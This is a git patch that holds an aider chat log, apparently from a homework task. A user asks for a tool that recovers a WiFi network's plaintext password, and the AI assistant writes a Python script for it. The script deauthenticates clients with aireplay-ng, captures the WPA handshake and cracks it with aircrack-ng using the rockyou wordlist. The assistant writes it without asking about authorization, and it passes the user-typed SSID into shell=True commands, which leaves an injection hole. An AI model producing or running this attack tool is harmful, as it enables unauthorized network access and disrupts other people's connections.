From c2e9d1eec5a4f129fe17489bbf19617f9300ace0 Mon Sep 17 00:00:00 2001 From: David Westgate Date: Thu, 30 May 2024 14:44:42 -0700 Subject: [PATCH] aider: Implemented a Python application to assist in WiFi penetration testing by prompting the user for a target network SSID, capturing the handshake, and cracking the password using a wordlist. # Aider chat conversation: USER: Generate a python application to assist in wifi penetration testing by prompting the user for the name (SSID) of a password protected wifi network and returning the plaintext password. This python application should use a combination of shell tools assumed to be on the users linux system, including but not limited to iwconfig, airmon-ng, airodump-ng, aireplay-ng, aircrack-ng. Operations may be run sequentially, or in parallel using multi-threading As needed, the use of shell tools should utilize sudo capabilities As needed, the application may utilize a wordlist found at ~/rockyou.txt As needed, the application can change the state of the users wifi interface between managed and monitor mode Save this to hw7/claude/app.py ASSISTANT: Here is the Python application to assist in WiFi penetration testing, saved to hw7/claude/app.py: hw7/claude/app.py ```python <<<<<<< SEARCH ======= import subprocess import re def run_command(command): output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT) return output.decode('utf-8') def change_to_monitor_mode(interface): run_command(f"sudo airmon-ng start {interface}") def change_to_managed_mode(interface): run_command(f"sudo airmon-ng stop {interface}") def get_wifi_interfaces(): output = run_command("iwconfig") interfaces = re.findall(r"(\w+)\s+IEEE", output) return interfaces def get_target_network(interface): while True: target_ssid = input("Enter the SSID of the target network: ") output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}") if target_ssid in output: break print(f"Network {target_ssid} not found. Please try again.") return target_ssid def capture_handshake(target_network, interface): print(f"Capturing handshake for network {target_network}...") run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &") run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}") run_command("sudo killall airodump-ng") def crack_password(capture_file, wordlist): print("Cracking password...") output = run_command(f"aircrack-ng {capture_file} -w {wordlist}") password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1) return password def main(): interfaces = get_wifi_interfaces() if len(interfaces) == 0: print("No WiFi interfaces found.") return interface = interfaces[0] print(f"Using interface {interface}") change_to_monitor_mode(interface) target_network = get_target_network(interface) capture_handshake(target_network, interface) change_to_managed_mode(interface) capture_file = "capture-01.cap" wordlist = "~/rockyou.txt" password = crack_password(capture_file, wordlist) print(f"Password for network {target_network} is: {password}") if __name__ == "__main__": main() >>>>>>> REPLACE ``` This application does the following: 1. Gets the available WiFi interfaces using `iwconfig` 2. Prompts the user to enter the SSID of the target network 3. Changes the WiFi interface to monitor mode using `airmon-ng` 4. Captures the handshake for the target network using `airodump-ng` and `aireplay-ng` 5. Changes the WiFi interface back to managed mode 6. Cracks the password using the captured handshake file and a wordlist (`~/rockyou.txt`) with `aircrack-ng` 7. Prints out the cracked password for the target network It uses `subprocess` to run the shell commands and `re` to parse the output. The WiFi interface is changed between managed and monitor modes as needed. --- hw7/claude/app.py | 63 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) diff --git a/hw7/claude/app.py b/hw7/claude/app.py index e69de29..95ad8ab 100644 --- a/hw7/claude/app.py +++ b/hw7/claude/app.py @@ -0,0 +1,63 @@ +import subprocess +import re + +def run_command(command): + output = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT) + return output.decode('utf-8') + +def change_to_monitor_mode(interface): + run_command(f"sudo airmon-ng start {interface}") + +def change_to_managed_mode(interface): + run_command(f"sudo airmon-ng stop {interface}") + +def get_wifi_interfaces(): + output = run_command("iwconfig") + interfaces = re.findall(r"(\w+)\s+IEEE", output) + return interfaces + +def get_target_network(interface): + while True: + target_ssid = input("Enter the SSID of the target network: ") + output = run_command(f"sudo airodump-ng --essid '{target_ssid}' {interface}") + if target_ssid in output: + break + print(f"Network {target_ssid} not found. Please try again.") + return target_ssid + +def capture_handshake(target_network, interface): + print(f"Capturing handshake for network {target_network}...") + run_command(f"sudo airodump-ng --essid '{target_network}' --write capture {interface} &") + run_command(f"sudo aireplay-ng -0 1 -e '{target_network}' {interface}") + run_command("sudo killall airodump-ng") + +def crack_password(capture_file, wordlist): + print("Cracking password...") + output = run_command(f"aircrack-ng {capture_file} -w {wordlist}") + password = re.search(r"KEY FOUND! \[(.*?)\]", output).group(1) + return password + +def main(): + interfaces = get_wifi_interfaces() + if len(interfaces) == 0: + print("No WiFi interfaces found.") + return + + interface = interfaces[0] + print(f"Using interface {interface}") + + change_to_monitor_mode(interface) + + target_network = get_target_network(interface) + capture_handshake(target_network, interface) + + change_to_managed_mode(interface) + + capture_file = "capture-01.cap" + wordlist = "~/rockyou.txt" + password = crack_password(capture_file, wordlist) + + print(f"Password for network {target_network} is: {password}") + +if __name__ == "__main__": + main()